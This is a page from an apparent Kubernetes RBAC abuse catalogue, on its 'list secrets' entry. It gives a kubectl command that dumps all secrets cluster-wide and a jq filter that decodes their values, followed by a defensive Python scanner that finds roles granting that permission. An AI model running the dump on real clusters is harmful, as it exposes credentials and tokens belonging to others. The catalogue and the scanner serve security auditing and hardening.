can-i gtfo?

Kubernetes RBAC Abuse Collection


list secrets

Abuses

Information Disclosure

List can return not only the name of a resource but also its full details.

# Dump secrets across all namespaces
kubectl get secrets --all-namespaces -o json > secrets.json

# Extract values base64 decoded
jq '{
  secrets: [.items[] |
    {
      name: .metadata.name,
      data: ( .data // {} | with_entries(.value |= @base64d) )
    }
  ]
}' secrets.json
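
To find which roles carry this permission, the following added example (not part of the original collection) scans RBAC objects for rules that grant list on secrets, either explicitly or through wildcards. The sample input is constructed and mirrors the shape of kubectl get clusterroles,roles -A -o json; the function names are illustrative.

```python
import json

# Constructed sample, shaped like `kubectl get clusterroles,roles -A -o json`.
SAMPLE = json.loads('''
{"items": [
  {"kind": "ClusterRole", "metadata": {"name": "inventory-reader"},
   "rules": [{"apiGroups": [""], "resources": ["pods", "secrets"], "verbs": ["list"]}]},
  {"kind": "Role", "metadata": {"name": "deployer", "namespace": "ci"},
   "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
  {"kind": "Role", "metadata": {"name": "cm-reader", "namespace": "web"},
   "rules": [{"apiGroups": [""], "resources": ["configmaps"], "verbs": ["get", "list"]}]},
  {"kind": "ClusterRole", "metadata": {"name": "apps-lister"},
   "rules": [{"apiGroups": ["apps"], "resources": ["*"], "verbs": ["list"]}]},
  {"kind": "ClusterRole", "metadata": {"name": "metrics"},
   "rules": [{"nonResourceURLs": ["/metrics"], "verbs": ["get"]}]}
]}
''')


def _matches(values, wanted):
    """True if an RBAC rule field names `wanted` explicitly or via the '*' wildcard."""
    return wanted in values or "*" in values


def grants_secret_list(rule):
    """True if one PolicyRule allows `list` on secrets in the core ("") API group."""
    return (_matches(rule.get("apiGroups", []), "")
            and _matches(rule.get("resources", []), "secrets")
            and _matches(rule.get("verbs", []), "list"))


def find_secret_listers(rbac):
    """Return sorted (kind, namespace, name) for every role that can list secrets."""
    hits = set()
    for item in rbac.get("items", []):
        meta = item.get("metadata", {})
        # ClusterRoles have no namespace; aggregated roles may carry rules: null.
        if any(grants_secret_list(r) for r in item.get("rules") or []):
            hits.add((item["kind"], meta.get("namespace", ""), meta["name"]))
    return sorted(hits)


if __name__ == "__main__":
    for kind, ns, name in find_secret_listers(SAMPLE):
        print(f"{kind} {ns + '/' if ns else ''}{name} can list secrets")
```

Each role reported here should be treated as having read access to secret values, and its bindings reviewed accordingly.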